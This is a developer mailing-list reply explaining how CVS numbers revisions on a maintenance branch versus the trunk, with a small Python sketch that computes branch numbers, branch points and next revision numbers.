In-Reply-To: <15126.44584.300357.360209@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
	<15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
	<15126.44584.300357.360209@beluga.mojam.com>
Message-ID: <15126.45534.417066.445852@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > Functionally, the checkin isn't a muff (it does have the change I intended),
 > but I was worried about the version number.  Should I have checked it in as
 > version 1.34.2.1 or 1.35?

  If the change should happen on the branch, leave it in.  If it's
also needed on the HEAD, check it in again there, and you're done.
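The version-number puzzle follows from how CVS numbers revisions. The
working directory carried the sticky tag release21-maint, so the commit
landed on that branch rather than on the trunk. Trunk revisions have two
components (1.34, 1.35); a branch revision appends a branch number and a
serial, so 1.34.2.1 is the first commit on branch 1.34.2, which sprouts from
trunk revision 1.34. The helpers below are a small hypothetical sketch of
that arithmetic, not part of any CVS tool.

```python
def _parts(rev):
    parts = rev.split(".")
    # A CVS revision number has an even number of numeric components.
    if len(parts) < 2 or len(parts) % 2 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a CVS revision number: {rev!r}")
    return parts


def branch_of(rev):
    """Branch number a revision lives on, or None for the trunk."""
    parts = _parts(rev)
    return ".".join(parts[:-1]) if len(parts) > 2 else None


def branch_point(rev):
    """Revision the containing branch was created from (None on the trunk)."""
    parts = _parts(rev)
    return ".".join(parts[:-2]) if len(parts) > 2 else None


def next_revision(rev):
    """Number the next commit on the same line of development normally gets."""
    *head, last = _parts(rev)
    return ".".join(head + [str(int(last) + 1)])


print(branch_of("1.34.2.1"), branch_point("1.34.2.1"))  # 1.34.2 1.34
print(next_revision("1.34.2.1"), next_revision("1.34"))  # 1.34.2.2 1.35
```

So the fix went in as 1.34.2.1 on the maintenance branch; the separate
checkin on the HEAD would normally become 1.35.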


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations